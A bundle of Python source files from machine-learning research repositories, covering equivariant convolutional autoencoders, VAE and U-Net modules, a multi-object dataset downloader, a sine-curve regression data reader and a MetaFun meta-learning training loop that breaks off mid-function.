eps = torch.normal(torch.zeros_like(mu), torch.ones_like(sigma))
return eps * sigma + mu
def reconstruct(self, x, g=None, origin=(0,0)):
mu, _, crs, z_eqv = self.encode(x)
if g is not None:
crs, z_eqv = self.g_act_z(g, z_eqv, origin)
x_hat = self.decode(mu, crs)
return x_hat
def generate(self, crs, n_samples=16):
z_inv = torch.normal(torch.zeros(n_samples, self.dim_latent), torch.ones(n_samples, self.dim_latent))
z_eqv = torch.rand(n_samples, 3) * torch.Tensor([[self.n_rot, self.img_size, self.img_size]]).type_as(z_inv)
if self.fiber_group == 'trivial':
pass
elif self.fiber_group == 'rot_2d':
pass
x_hat = self.decode(z_inv, crs)
return x_hat
def forward(self, x):
mu, _, _, z_eqv = self.encode(x)
return torch.cat([mu, z_eqv.elems], dim=1)
def compute_loss_and_metrics(self, x, y=None):
mu, log_sigma_sq, crs, z_eqv = self.encode(x)
z_inv = self.reparameterize(mu, log_sigma_sq)
x_hat = self.decode(z_inv, crs)
recon_loss = F.mse_loss(x_hat, x, reduction='sum') / x.size()[0]
kl_loss = torch.sum(-0.5 * torch.sum(1 + log_sigma_sq - mu ** 2 - log_sigma_sq.exp(), dim = 1), dim = 0) / x.size()[0]
loss = recon_loss + kl_loss
logs = {
"recon": recon_loss,
"kl": kl_loss,
"elbo": loss
}
return loss, logs
```
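`compute_loss_and_metrics` above uses the closed-form KL between the diagonal Gaussian posterior and a standard normal prior; a small standalone check of that term against `torch.distributions` (shapes are arbitrary):
```python
import torch
from torch.distributions import Normal, kl_divergence

mu = torch.randn(4, 16)
log_sigma_sq = torch.randn(4, 16)

closed_form = -0.5 * torch.sum(1 + log_sigma_sq - mu ** 2 - log_sigma_sq.exp(), dim=1)
reference = kl_divergence(Normal(mu, torch.exp(log_sigma_sq / 2.)), Normal(0.0, 1.0)).sum(dim=1)
assert torch.allclose(closed_form, reference, atol=1e-4)
```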
#### File: elm/nn/eqv_conv_nn.py
```python
from collections import deque
import numpy as np
import torch
import torch.nn.functional as F
import pytorch_lightning as pl
from .conv_nn import BaseConvNN, ConvNN
from .subsampling import EquivariantSubSampling, EquivariantFeatureSpace2Group
from .upsampling import EquivariantUpSampling
from elm.utils import get_same_pad, kaiming_init
from elm.utils import CyclicGArray, Rot2dOnCyclicGArray, FlipRot2dOnCyclicGArray, recursive_decomposition, product_of_representives
class EquivariantConvNN(ConvNN):
def __init__(self,
in_channels,
out_channels,
kernel_size,
scale_factor=1,
padding_mode='circular',
activation=F.relu,
out_activation=None,
use_bias=True,
before_activation=False,
device='cuda'):
super().__init__(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding_mode=padding_mode,
activation=activation,
out_activation=out_activation,
use_bias=use_bias,
device=device)
self.scale_factor = scale_factor
self.before_activation = before_activation
self.f2q = EquivariantFeatureSpace2Group(in_channels=self.out_channels[0],
fiber_group='trivial',
temperature=0.0001)
for i, layer in enumerate(self.layers):
layer['subsampling'] = EquivariantSubSampling(scale_factor=self.scale_factor[i, 0], fiber_group='trivial')
def forward(self, x):
_, _, h, w = x.size()
y = x
crs = None
for i, layer in enumerate(self.layers):
_, _, h, w = y.size()
pad = get_same_pad(size=[h, w], kernel_size=self.kernel_size[i], stride=1)
y = F.pad(y, pad, mode=self.padding_mode)
y = layer['conv'](y)
if layer['activation'] is not None:
y = layer['activation'](y)
if not self.before_activation and self.scale_factor[i, 0] > 1:
if crs is None:
z = self.f2q(y)
garray = CyclicGArray(elems=z[:, 2:], N=h, D=2)
crs = recursive_decomposition(garray, quotient_orders=self.scale_factor, fiber_group='trivial')
y = layer['subsampling'](y, crs[:, i])
return y, crs, garray
class EquivariantConvTransposeNN(BaseConvNN):
def __init__(self,
in_channels,
out_channels,
kernel_size,
scale_factor=1,
padding_mode='circular',
activation=F.relu,
out_activation=None,
use_bias=True,
avg_pool_size=1,
device='cuda'):
super().__init__(in_channels=in_channels,
out_channels=out_channels,
kernel_size=kernel_size,
padding_mode=padding_mode,
activation=activation,
out_activation=out_activation,
use_bias=use_bias,
device=device)
self.scale_factor = scale_factor
self.avg_pool_size = avg_pool_size
self.layers = []
for i in range(self.num_layers):
layer = {}
layer['upsampling'] = EquivariantUpSampling(scale_factor=self.scale_factor[i, 0], fiber_group='trivial')
layer['conv_transpose'] = torch.nn.ConvTranspose2d(self.in_channels[i],
self.out_channels[i],
kernel_size=self.kernel_size[i],
stride=1,
padding=self.kernel_size[i]-1,
bias=self.use_bias)
self.add_module("conv_transpose_{}".format(i+1), layer['conv_transpose'])
if self.avg_pool_size > 1:
layer['smoothing'] = torch.nn.AvgPool2d(self.avg_pool_size, stride=1)
layer['activation'] = self.activation if i < self.num_layers - 1 else self.out_activation
kaiming_init(layer['conv_transpose'], F.relu, 1, mode='fan_out', use_bias=self.use_bias)
self.layers.append(layer)
def forward(self, x, crs):
y = x
crs = deque(torch.unbind(crs, dim=1))
for i, layer in enumerate(self.layers):
if self.scale_factor[i, 0] > 1:
y = layer['upsampling'](y, crs.pop())
y = y * self.scale_factor[i, 0]
y = F.pad(y, pad=[(self.kernel_size[i]-1)//2 for _ in range(4)], mode=self.padding_mode)
y = layer['conv_transpose'](y)
if self.avg_pool_size > 1:
_, _, h, w = y.size()
pad = get_same_pad(size=[h, w], kernel_size=self.avg_pool_size, stride=1)
y = F.pad(y, pad=pad, mode=self.padding_mode)
y = layer['smoothing'](y)
if layer['activation'] is not None:
y = layer['activation'](y)
return y
```
#### File: elm/nn/gaussian_blur.py
```python
import numpy as np
import torch
import torch.nn.functional as F
from scipy.ndimage import gaussian_filter
class GaussianBlur(torch.nn.Module):
def __init__(self, kernel_size, sigma=1.0):
super().__init__()
for k in kernel_size:
assert k % 2==1, "currently only support odd kernel size"
self.n_dim = len(kernel_size)
self.kernel_size = kernel_size
self.sigma = sigma
inputs = np.zeros(self.kernel_size)
inputs[tuple([k//2 for k in self.kernel_size])] = np.prod(self.kernel_size)
kernel = gaussian_filter(inputs, sigma=self.sigma, mode='constant')
self.register_buffer("kernel", torch.Tensor(kernel))
def forward(self, x):
pad = []
for k in self.kernel_size[::-1]:
pad += [k//2, k//2]
x = F.pad(x, pad=pad, mode='circular')
weights = torch.unsqueeze(torch.unsqueeze(self.kernel.type_as(x), dim=0), dim=0)
return F.conv3d(x, weights)
```
#### File: forge/forge/data.py
```python
from builtins import range
import numpy as np
import itertools
import tensorflow as tf
def tensors_from_data(data_dict, batch_size, axes=None, shuffle=False):
"""Turns a dict of numpy.ndarrays into a dict of minibatch tensors.
Arrays are split into minibatches of `batch_size` along `axes`. If `axes` is None,
then all arrays are split along axis==0. Tensors can iterate sequentially over the
passed arrays if shuffle=False or in a random order if shuffle=True.
:param data_dict: dict of {key: nump.ndarray}.
:param batch_size: integer
:param axes: dict of {k: integer} or None
:param shuffle: boolean.
:return: dict of {key: tf.Tensor}
"""
keys = list(data_dict.keys())
if axes is None:
axes = {k: 0 for k in keys}
key = keys[0]
ax = axes[key]
n_entries = data_dict[key].shape[ax]
if shuffle:
def idx_fun():
return np.random.choice(n_entries, batch_size, replace=False)
else:
rolling_idx = itertools.cycle(range(0, n_entries - batch_size + 1, batch_size))
def idx_fun():
start = next(rolling_idx)
end = start + batch_size
return np.arange(start, end)
def data_fun():
idx = idx_fun()
minibatch = []
for k in keys:
item = data_dict[k]
minibatch_item = item.take(idx, axes[k])
minibatch.append(minibatch_item)
return minibatch
minibatch = data_fun()
types = [getattr(tf, str(m.dtype)) for m in minibatch]
tensors = tf.py_func(data_fun, [], types)
for t, m in zip(tensors, minibatch):
t.set_shape(m.shape)
tensors = data_dict.__class__({k: v for k, v in zip(keys, tensors)})
return tensors
```
#### File: forge/forge/debug.py
```python
from __future__ import print_function
import functools
import sys
import traceback
import pdb
def debug_on(*exceptions):
"""Adapted from https://stackoverflow.com/questions/18960242/is-it-possible-to-automatically-break-into-the-debugger-when-a-exception-is-thro/18962528
"""
if not exceptions:
exceptions = (AssertionError,)
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except exceptions as err:
last_traceback = sys.exc_info()[2]
traceback.print_tb(last_traceback)
print(err)
pdb.post_mortem(last_traceback)
return wrapper
return decorator
```
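A quick sketch of how the decorator above is used: when the wrapped function raises one of the listed exception types, the traceback is printed and a pdb post-mortem session opens at the failing frame.
```python
from forge.debug import debug_on  # import path assumed from the repo layout

@debug_on(ZeroDivisionError)
def divide(a, b):
    return a / b

divide(1, 0)  # prints the traceback, then drops into pdb at the raising frame
```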
#### File: genesis/models/vae_config.py
```python
from attrdict import AttrDict
import torch
import torch.nn as nn
from torch.distributions.normal import Normal
from forge import flags
from modules.blocks import Flatten
from modules.decoders import BroadcastDecoder
from third_party.sylvester.VAE import VAE
# GatedConvVAE
flags.DEFINE_integer('latent_dimension', 64, 'Latent channels.')
flags.DEFINE_boolean('broadcast_decoder', False,
'Use broadcast decoder instead of deconv.')
# Losses
flags.DEFINE_boolean('pixel_bound', True, 'Bound pixel values to [0, 1].')
flags.DEFINE_float('pixel_std', 0.7, 'StdDev of reconstructed pixels.')
def load(cfg):
return BaselineVAE(cfg)
class BaselineVAE(nn.Module):
def __init__(self, cfg):
super(BaselineVAE, self).__init__()
cfg.K_steps = None
# Configuration
self.ldim = cfg.latent_dimension
self.pixel_std = cfg.pixel_std
self.pixel_bound = cfg.pixel_bound
self.debug = cfg.debug
# Module
nin = cfg.input_channels if hasattr(cfg, 'input_channels') else 3
self.vae = VAE(self.ldim, [nin, cfg.img_size, cfg.img_size], nin)
if cfg.broadcast_decoder:
self.vae.p_x_nn = nn.Sequential(
Flatten(),
BroadcastDecoder(in_chnls=self.ldim, out_chnls=64, h_chnls=64,
num_layers=4, img_dim=cfg.img_size,
act=nn.ELU()),
nn.ELU()
)
self.vae.p_x_mean = nn.Conv2d(64, nin, 1, 1, 0)
def forward(self, x):
""" x (torch.Tensor): Input images [batch size, 3, dim, dim] """
# Forward propagation
recon, stats = self.vae(x)
if self.pixel_bound:
recon = torch.sigmoid(recon)
# Reconstruction loss
p_xr = Normal(recon, self.pixel_std)
err = -p_xr.log_prob(x).sum(dim=(1, 2, 3))
# KL divergence loss
p_z = Normal(0, 1)
# TODO(martin): the parsing below is not very intuitive
# -- No flow
if 'z' in stats:
q_z = Normal(stats.mu, stats.sigma)
kl = q_z.log_prob(stats.z) - p_z.log_prob(stats.z)
kl = kl.sum(dim=1)
# -- Using normalising flow
else:
q_z_0 = Normal(stats.mu_0, stats.sigma_0)
kl = q_z_0.log_prob(stats.z_0) - p_z.log_prob(stats.z_k)
kl = kl.sum(dim=1) - stats.ldj
# Tracking
losses = AttrDict(err=err, kl_l=kl)
return recon, losses, stats, None, None
def sample(self, batch_size, *args, **kwargs):
# Sample z
z = Normal(0, 1).sample([batch_size, self.ldim])
# Decode z
x = self.vae.decode(z)
if self.pixel_bound:
x = torch.sigmoid(x)
return x, AttrDict(z=z)
def get_features(self, image_batch):
with torch.no_grad():
_, _, stats, _, _ = self.forward(image_batch)
return stats.z
```
#### File: genesis/modules/component_vae.py
```python
from attrdict import AttrDict
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions.normal import Normal
import genesis.modules.blocks as B
from genesis.modules.encoders import MONetCompEncoder
from genesis.modules.decoders import BroadcastDecoder
class ComponentVAE(nn.Module):
def __init__(self,
img_size,
nout,
comp_ldim=15,
comp_enc_channels=32,
comp_dec_channels=32,
comp_dec_layers=4,
montecarlo_kl=True,
pixel_bound=True,
act=F.relu):
super(ComponentVAE, self).__init__()
self.ldim = comp_ldim # paper uses 16
self.montecarlo = montecarlo_kl
self.pixel_bound = pixel_bound
# Sub-Modules
self.encoder_module = MONetCompEncoder(img_size=img_size,
input_channels=3,
comp_enc_channels=comp_enc_channels,
comp_ldim=comp_ldim,
act=act)
self.decoder_module = BroadcastDecoder(
in_chnls=self.ldim,
out_chnls=nout,
h_chnls=comp_dec_channels,
num_layers=comp_dec_layers,
img_dim=img_size,
act=act
)
def forward(self, x, log_mask):
"""
Args:
x (torch.Tensor): Input to reconstruct [batch size, 3, dim, dim]
log_mask (torch.Tensor or list of torch.Tensors):
Mask to reconstruct [batch size, 1, dim, dim]
"""
# -- Check if inputs are lists
K = 1
b_sz = x.size(0)
if isinstance(log_mask, list) or isinstance(log_mask, tuple):
K = len(log_mask)
# Repeat x along batch dimension
x = x.repeat(K, 1, 1, 1)
# Concat log_m_k along batch dimension
log_mask = torch.cat(log_mask, dim=0)
# -- Encode
mask = log_mask.exp()
x *= mask
x = torch.cat((log_mask, x), dim=1)
mu, sigma = self.encode(x)
# -- Sample latents
q_z = Normal(mu, sigma)
# z - [batch_size * K, l_dim] with first axis: b0,k0 -> b0,k1 -> ...
z = q_z.rsample()
# -- Decode
# x_r, m_r_logits = self.decode(z)
x_r = self.decode(z)
# -- Track quantities of interest and return
x_r_k = torch.chunk(x_r, K, dim=0)
z_k = torch.chunk(z, K, dim=0)
mu_k = torch.chunk(mu, K, dim=0)
sigma_k = torch.chunk(sigma, K, dim=0)
stats = AttrDict(mu_k=mu_k, sigma_k=sigma_k, z_k=z_k)
return x_r_k, stats
def encode(self, x):
x = self.encoder_module(x)
mu, sigma_ps = torch.chunk(x, 2, dim=1)
sigma = B.to_sigma(sigma_ps)
return mu, sigma
def decode(self, z):
x_hat = self.decoder_module(z)
if self.pixel_bound:
x_hat = torch.sigmoid(x_hat)
return x_hat
def sample(self, batch_size=1, steps=1):
raise NotImplementedError
```
#### File: genesis/modules/unet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from genesis.modules.blocks import INConvBlock, Flatten
class UNet(nn.Module):
def __init__(self, num_blocks, filter_start=32):
super(UNet, self).__init__()
        # TODO(martin) generalise to other cases if needed
c = filter_start
if num_blocks == 4:
self.down = nn.ModuleList([
INConvBlock(4, c),
INConvBlock(c, 2*c),
INConvBlock(2*c, 2*c),
INConvBlock(2*c, 2*c), # no downsampling
])
self.up = nn.ModuleList([
INConvBlock(4*c, 2*c),
INConvBlock(4*c, 2*c),
INConvBlock(4*c, c),
INConvBlock(2*c, c)
])
elif num_blocks == 5:
self.down = nn.ModuleList([
INConvBlock(4, c),
INConvBlock(c, c),
INConvBlock(c, 2*c),
INConvBlock(2*c, 2*c),
INConvBlock(2*c, 2*c), # no downsampling
])
self.up = nn.ModuleList([
INConvBlock(4*c, 2*c),
INConvBlock(4*c, 2*c),
INConvBlock(4*c, c),
INConvBlock(2*c, c),
INConvBlock(2*c, c)
])
elif num_blocks == 6:
self.down = nn.ModuleList([
INConvBlock(4, c),
INConvBlock(c, c),
INConvBlock(c, c),
INConvBlock(c, 2*c),
INConvBlock(2*c, 2*c),
INConvBlock(2*c, 2*c), # no downsampling
])
self.up = nn.ModuleList([
INConvBlock(4*c, 2*c),
INConvBlock(4*c, 2*c),
INConvBlock(4*c, c),
INConvBlock(2*c, c),
INConvBlock(2*c, c),
INConvBlock(2*c, c)
])
self.mlp = nn.Sequential(
Flatten(),
nn.Linear(4*4*2*c, 128), nn.ReLU(),
nn.Linear(128, 128), nn.ReLU(),
nn.Linear(128, 4*4*2*c), nn.ReLU()
)
self.final_conv = nn.Conv2d(c, 1, 1)
def forward(self, x):
batch_size = x.size(0)
x_down = [x]
skip = []
for i, block in enumerate(self.down):
act = block(x_down[-1])
skip.append(act)
if i < len(self.down)-1:
act = F.interpolate(act, scale_factor=0.5, mode='nearest', recompute_scale_factor=True)
x_down.append(act)
x_up = self.mlp(x_down[-1]).view(batch_size, -1, 4, 4)
for i, block in enumerate(self.up):
features = torch.cat([x_up, skip[-1 - i]], dim=1)
x_up = block(features)
if i < len(self.up)-1:
x_up = F.interpolate(x_up, scale_factor=2.0, mode='nearest', recompute_scale_factor=True)
return self.final_conv(x_up), {}
```
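A quick shape check for the U-Net above, assuming the 5-block configuration and a 64x64 input with 4 channels (image plus a scope/mask channel), so that the bottleneck matches the 4*4*2*c MLP:
```python
# Hypothetical usage sketch; the input shape is an assumption consistent with the MLP sizing.
import torch

unet = UNet(num_blocks=5, filter_start=32)
inp = torch.rand(2, 4, 64, 64)     # 4 downsamplings: 64 -> 32 -> 16 -> 8 -> 4
logits, _ = unet(inp)
print(logits.shape)                # torch.Size([2, 1, 64, 64])
```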
#### File: gsubsampling/multi_object_datasets/load.py
```python
import os
import sys
from multi_object_datasets import clevr_with_masks, multi_dsprites
import numpy as np
import tensorflow as tf
from tqdm import tqdm
import urllib.request
from absl import app
from absl import flags
FLAGS = flags.FLAGS
flags.DEFINE_string('dataset', 'multi_dsprites', 'Name of the dataset')
flags.DEFINE_string('datadir', '/tmp', 'Root directory for data storage')
flags.DEFINE_integer('batch_size', 50, 'Batch size for iterating the dataset')
flags.DEFINE_integer('num_examples', 100000, 'Total number of datapoint used.')
def main(argv):
if FLAGS.dataset == 'multi_dsprites':
tf_records_path = os.path.join(FLAGS.datadir, "multi_dsprites_colored_on_colored.tfrecords")
if not os.path.exists(tf_records_path):
url = "https://storage.googleapis.com/multi-object-datasets/multi_dsprites/multi_dsprites_colored_on_colored.tfrecords"
print("Downloading from {}".format(url))
urllib.request.urlretrieve(url, tf_records_path)
fullpath = os.path.join(FLAGS.datadir, "multi_dsprites")
if not os.path.exists(fullpath):
os.makedirs(fullpath)
dataset = multi_dsprites.dataset(tf_records_path, 'colored_on_colored')
elif FLAGS.dataset == 'clevr':
tf_records_path = os.path.join(FLAGS.datadir, "clevr_with_masks_train.tfrecords")
if not os.path.exists(tf_records_path):
url = "https://storage.googleapis.com/multi-object-datasets/clevr_with_masks/clevr_with_masks_train.tfrecords"
print("Downloading from {}".format(url))
urllib.request.urlretrieve(url, tf_records_path)
fullpath = os.path.join(FLAGS.datadir, "clevr")
if not os.path.exists(fullpath):
os.makedirs(fullpath)
dataset = clevr_with_masks.dataset(tf_records_path)
batched_dataset = dataset.batch(FLAGS.batch_size)
iterator = tf.compat.v1.data.make_one_shot_iterator(batched_dataset)
FLAGS.num_examples = 100000
mmap_image, mmap_mask = None, None
n = 0
latents = {}
for idx, batch in tqdm(enumerate(iterator)):
if FLAGS.dataset == 'clevr':
image = batch['image'][:, 29:221, 64:256, :]
image = tf.image.resize(image, [64, 64], method=tf.image.ResizeMethod.BILINEAR)
image = tf.transpose(image, perm=[0,3,1,2])
mask = batch['mask'][:, :, 29:221, 64:256, :]
s = mask.get_shape().as_list()
mask = tf.image.resize(tf.reshape(mask, [s[0]*s[1], s[2], s[3], s[4]]), [64, 64], method=tf.image.ResizeMethod.BILINEAR)
mask = tf.reshape(mask, [s[0], s[1], 64, 64, s[4]])
mask = tf.transpose(mask, perm=[0,1,4,2,3])
elif FLAGS.dataset == 'multi_dsprites':
image = tf.transpose(batch['image'], perm=[0,3,1,2])
mask = tf.transpose(batch['mask'], perm=[0,1,4,2,3])
if mmap_image is None:
mmap_image = np.memmap(os.path.join(fullpath, "{}-image.npy".format(FLAGS.dataset)), dtype=np.uint8, mode='w+', shape=tuple([FLAGS.num_examples]+image.get_shape().as_list()[1:]))
if mmap_mask is None:
mmap_mask = np.memmap(os.path.join(fullpath, "{}-mask.npy".format(FLAGS.dataset)), dtype=np.uint8, mode='w+', shape=tuple([FLAGS.num_examples]+mask.get_shape().as_list()[1:]))
b = min(int(image.shape[0]), FLAGS.num_examples-n)
mmap_image[n:n+b] = image[:b].numpy()
mmap_image.flush()
mmap_mask[n:n+b] = mask[:b].numpy()
mmap_mask.flush()
n += b
for k, v in batch.items():
if k not in ['image', 'mask']:
if k not in latents:
latents[k] = v.numpy()
else:
latents[k] = np.concatenate([latents[k], v.numpy()], axis=0)
if n >= FLAGS.num_examples:
break
np.savez_compressed(os.path.join(fullpath, "{}-latent.npz".format(FLAGS.dataset)), **latents)
print("{0} dataset containing {1} examples has been generated at {2}".format(FLAGS.dataset, FLAGS.num_examples, fullpath))
if __name__ == '__main__':
app.run(main)
``` |
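A sketch of reading back the memmapped arrays written by the script above (the path and shapes are assumptions based on the `multi_dsprites` branch, the 64x64 output resolution and the default flags):
```python
# Hypothetical read-back of the generated arrays (uint8, CHW layout).
import numpy as np

root = "/tmp/multi_dsprites"                                        # assumed --datadir
images = np.memmap(f"{root}/multi_dsprites-image.npy", dtype=np.uint8,
                   mode="r", shape=(100000, 3, 64, 64))
latents = np.load(f"{root}/multi_dsprites-latent.npz")
print(images[0].shape, sorted(latents.files)[:3])
```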
{
"source": "jinxu06/MetaFun-Tensorflow",
"score": 2
} |
#### File: MetaFun-Tensorflow/data/sine_curves.py
```python
import collections
from absl import flags
import numpy as np
import tensorflow as tf
FLAGS = flags.FLAGS
flags.DEFINE_integer(
"max_num_context", 20, "maximal number of context points. for regression)")
RegressionDescription = collections.namedtuple(
"RegressionDescription",
("tr_input", "tr_output", "tr_func", "val_input", "val_output", "val_func"))
class SineCurvesReader(object):
def __init__(self,
batch_size,
max_num_context,
x_size=1,
y_size=1,
random_kernel_parameters=False,
testing=False, seed=None):
self._batch_size = batch_size
self._max_num_context = max_num_context
self._x_size = x_size
self._y_size = y_size
self._random_kernel_parameters = random_kernel_parameters
self._testing = testing
self._seed = seed
def generate_curves(self):
num_context = tf.random.uniform(
shape=[], minval=1, maxval=self._max_num_context, dtype=tf.int32, seed=self._seed)
if self._testing:
num_total_points = 1000
num_target = num_total_points - num_context
x_values = tf.tile(
tf.expand_dims(tf.range(-5., 5., 1. / 100, dtype=tf.float32), axis=0),
[self._batch_size, 1])
x_values = tf.expand_dims(x_values, axis=-1)
else:
num_target = tf.random_uniform(shape=(), minval=1,
maxval=self._max_num_context+1 - num_context,
dtype=tf.int32, seed=self._seed)
num_total_points = num_context + num_target
x_values = tf.random_uniform(
[self._batch_size, num_total_points, self._x_size], -5, 5, seed=self._seed)
amp = tf.random.uniform(shape=[self._batch_size, 1, 1], minval=0.1, maxval=5.0, seed=self._seed)
phase = tf.random.uniform(shape=[self._batch_size, 1, 1], minval=0., maxval=np.pi, seed=self._seed)
frequency = 1.0
func_values = amp * tf.math.sin(frequency * (x_values - phase))
y_values = func_values
# if consider observation noise:
# y_values = func_values + tf.random.normal(shape=tf.shape(func_values), stddev=0.5, seed=self._seed)
if self._testing:
target_x = x_values
target_y = y_values
target_f = func_values
idx = tf.random_shuffle(tf.range(num_total_points), seed=self._seed)
context_x = tf.gather(x_values, idx[:num_context], axis=1)
context_y = tf.gather(y_values, idx[:num_context], axis=1)
context_f = tf.gather(func_values, idx[:num_context], axis=1)
else:
target_x = x_values[:, num_context : num_target + num_context, :]
target_y = y_values[:, num_context : num_target + num_context, :]
target_f = func_values[:, num_context : num_target + num_context, :]
context_x = x_values[:, :num_context, :]
context_y = y_values[:, :num_context, :]
context_f = func_values[:, :num_context, :]
return RegressionDescription(
tr_input=context_x,
tr_output=context_y,
tr_func=context_f,
val_input=target_x,
val_output=target_y,
val_func=target_f)
```
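A minimal graph-mode usage sketch for the reader above (a TF1-style session is assumed, matching the rest of the repository):
```python
# Hypothetical usage sketch: draw one meta-batch of sine-curve regression tasks.
import tensorflow as tf

data = SineCurvesReader(batch_size=16, max_num_context=20).generate_curves()
with tf.compat.v1.Session() as sess:
    batch = sess.run(data)
    print(batch.tr_input.shape, batch.val_input.shape)  # e.g. (16, n_context, 1) (16, n_target, 1)
```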
#### File: jinxu06/MetaFun-Tensorflow/learner.py
```python
from six.moves import range
from six.moves import zip
import os
import pickle
import functools
from absl import flags
import numpy as np
import tensorflow as tf
import data.classification as cls_data
from data.sine_curves import SineCurvesReader
import utils
FLAGS = flags.FLAGS
flags.DEFINE_float("outer_lr", 1e-4, "Outer learning rate (Learning rate for the global optimiser).")
flags.DEFINE_integer("training_batch_size", 12, "Number of tasks in a batch for training.")
flags.DEFINE_integer("eval_batch_size", 100, "Number of tasks in a batch for evaluation.")
flags.DEFINE_boolean("no_early_stopping", False, "Whether to remove early_stopping and "
"use the latest model checkpoint.")
flags.DEFINE_boolean("train_on_val", False, "Whether to train on the union of meta-train "
"and meta-validation data.")
class CLearner(object):
def __init__(self, name=""):
self.name = name
self.eval_metric_type = 'acc'
def load_data(self):
assert FLAGS.dataset_name in ['miniImageNet', 'tieredImageNet'], "Unknown dataset name"
self.train_data = cls_data.construct_examples_batch(FLAGS.dataset_name,
FLAGS.training_batch_size, "train", train_on_val=FLAGS.train_on_val)
self.eval_data = cls_data.construct_examples_batch(FLAGS.dataset_name, FLAGS.eval_batch_size, "val")
self.test_data = cls_data.construct_examples_batch(FLAGS.dataset_name, FLAGS.eval_batch_size, "test")
def construct_graph(self, model_cls):
# construct model
self.model = model_cls()
# construct loss and accuracy ops
self.train_loss, self.train_tr_metric, self.train_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.train_data, is_training=True)
self.train_eval_loss, self.train_eval_tr_metric, self.train_eval_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.train_data, is_training=False)
self.eval_loss, self.eval_tr_metric, self.eval_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.eval_data, is_training=False)
self.test_loss, self.test_tr_metric, self.test_val_metric = \
_construct_loss_and_eval_ops_for_classification(self.model, self.test_data, is_training=False)
# construct optimisation ops
training_variables = tf.compat.v1.trainable_variables()
training_gradients = tf.gradients(self.train_loss, training_variables)
training_gradients = utils.clip_gradients(training_gradients, 0, 0) # gradient clipping is not used
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=FLAGS.outer_lr)
self.global_step = tf.compat.v1.train.get_or_create_global_step()
self.train_op = optimizer.apply_gradients(
list(zip(training_gradients, training_variables)), self.global_step)
def train(self, num_steps_limit, checkpoint_steps, checkpoint_path):
global_step_ev = tf.compat.v1.train.global_step(self.sess, self.global_step)
best_eval_metric = (0.0 if self.eval_metric_type == 'acc' else 1.e16)
while global_step_ev <= num_steps_limit:
if global_step_ev % checkpoint_steps == 0:
# evaluating model when checkpointing
eval_tr_metric_ev, eval_val_metric_ev = utils.evaluate_and_average(
self.sess, [self.eval_tr_metric, self.eval_val_metric], 10)
print("[ Step: {1} meta-valid context_{0}: {2:.5f}, "
"meta-valid target_{0}: {3:.5f} ]".format(self.eval_metric_type,
global_step_ev, eval_tr_metric_ev, eval_val_metric_ev))
# copy best checkpoints for early stopping
if self.eval_metric_type == 'acc':
if eval_val_metric_ev > best_eval_metric:
utils.copy_checkpoint(checkpoint_path, global_step_ev,
eval_val_metric_ev, eval_metric_type=self.eval_metric_type)
best_eval_metric = eval_val_metric_ev
else:
if eval_val_metric_ev < best_eval_metric:
utils.copy_checkpoint(checkpoint_path, global_step_ev,
eval_val_metric_ev, eval_metric_type=self.eval_metric_type)
best_eval_metric = eval_val_metric_ev
self.visualise(save_name="{0}-{1}".format(self.name, global_step_ev))
if global_step_ev == num_steps_limit:
global_step_ev += 1
continue
# train step
_, train_tr_metric_ev, train_val_metric_ev = self.sess.run([self.train_op, self.train_tr_metric, self.train_val_metric])
global_step_ev = tf.compat.v1.train.global_step(self.sess, self.global_step)
def evaluate(self, num_examples=10000, eval_set='val'):
num_estimates = (num_examples // FLAGS.eval_batch_size)
if eval_set == 'train':
tr_metric_ev, val_metric_ev = utils.evaluate_and_average(
self.sess, [self.train_eval_tr_metric, self.train_eval_val_metric], num_estimates)
elif eval_set == 'val':
tr_metric_ev, val_metric_ev = utils.evaluate_and_average(
self.sess, [self.eval_tr_metric, self.eval_val_metric], num_estimates)
elif eval_set == 'test':
tr_metric_ev, val_metric_ev = utils.evaluate_and_average(
self.sess, [self.test_tr_metric, self.test_val_metric], num_estimates)
early_stopping_step = tf.compat.v1.train.global_step(self.sess, self.global_step)
print("[ Evaluation --- context_{0}: {1:.5f}, target_{0}: {2:.5f} @checkpoint step {3} ]".format(self.eval_metric_type, tr_metric_ev, val_metric_ev, early_stopping_step))
return val_metric_ev, early_stopping_step
def visualise(self, save_name="test", num_plots=9):
pass
def set_session(self, sess):
self.sess = sess
def get_session(self):
return self.sess
def _construct_loss_and_eval_ops_for_classification(inner_model, inputs, is_training):
call_fn = functools.partial(inner_model.__call__, is_training=is_training)
per_instance_loss, per_instance_tr_metric, per_instance_val_metric = tf.map_fn(call_fn, inputs, dtype=(tf.float32, tf.float32, tf.float32),
back_prop=is_training)
loss = tf.reduce_mean(per_instance_loss)
tr_metric = tf.reduce_mean(per_instance_tr_metric)
val_metric = tf.reduce_mean(per_instance_val_metric)
return loss, tr_metric, val_metric
class RLearner(CLearner):
def __init__(self, name="", result_path="results"):
super(RLearner, self).__init__(name=name)
self.eval_metric_type = "mse"
self.result_path = result_path
def load_data(self):
if FLAGS.dataset_name == 'sinusoid':
self.train_data = SineCurvesReader(batch_size=FLAGS.training_batch_size,
max_num_context=FLAGS.max_num_context).generate_curves()
self.eval_data = SineCurvesReader(batch_size=FLAGS.eval_batch_size,
max_num_context=FLAGS.max_num_context, testing=True).generate_curves()
self.test_data = self.eval_data
else:
raise NameError("Unknown dataset name")
def construct_graph(self, model_cls):
# model
self.model = model_cls()
# loss and accuracy
train_ops = _construct_loss_and_eval_ops_for_regression(self.model, self.train_data, is_training=True)
self.train_loss, self.train_tr_metric, self.train_val_metric = train_ops[0], train_ops[1], train_ops[2]
eval_ops = _construct_loss_and_eval_ops_for_regression(self.model, self.eval_data, is_training=False)
self.eval_loss, self.eval_tr_metric, self.eval_val_metric, self.eval_tr_input, self.eval_tr_output, \
self.eval_tr_func, self.eval_val_input, self.eval_val_output, self.eval_val_func, self.eval_val_preds, \
self.eval_val_sigma = eval_ops
# optimisation
training_variables = tf.trainable_variables()
training_gradients = tf.gradients(self.train_loss, training_variables)
training_gradients = utils.clip_gradients(training_gradients, 0, 0)
optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=FLAGS.outer_lr)
self.global_step = tf.compat.v1.train.get_or_create_global_step()
self.train_op = optimizer.apply_gradients(
